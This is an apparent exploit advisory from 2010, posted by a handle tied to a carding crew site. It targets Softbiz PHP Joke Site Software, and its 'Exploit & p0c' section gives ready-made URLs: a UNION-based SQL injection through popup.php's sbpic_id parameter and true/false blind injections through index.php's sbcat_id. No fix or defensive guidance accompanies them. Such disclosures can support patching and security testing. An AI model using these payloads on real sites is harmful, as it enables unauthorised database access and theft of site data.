Softbiz PHP Joke Site Software Multiple SQL injection Vulnerability

										.WEB.ID

-----------------------------------------------------------------------

  Softbiz PHP Joke Site Software Multiple SQL injection Vulnerability

-----------------------------------------------------------------------

Author  	: v3n0m

Site    	: http://yogyacarderlink.web.id/

Date		: December, 18-2010

Location	: Jakarta, Indonesia

Time Zone	: GMT +7:00



Application	: PHP Joke Site Software

Price		: $29

Vendor  	: http://www.softbizsolutions.com/



Exploit & p0c

_____________



**[SQLi]

http://site/[path]/popup.php?sbpic_id=[SQLi]

http://site/[path]/popup.php?sbpic_id=-9999+union+all+select+1,2,3,version(),5,6,7,8,9,10,11--



**[Blind SQLi]

http://site/[path]/index.php?sbcat_id=[Blind SQLi]

http://site/[path]/index.php?sbcat_id=6+and+substring(version(),1,1)=5  << true

http://site/[path]/index.php?sbcat_id=6+and+substring(version(),1,1)=4  << false



_______________________________________



All YOGYACARDERLINK CREW & Jovita Andy

_______________________________________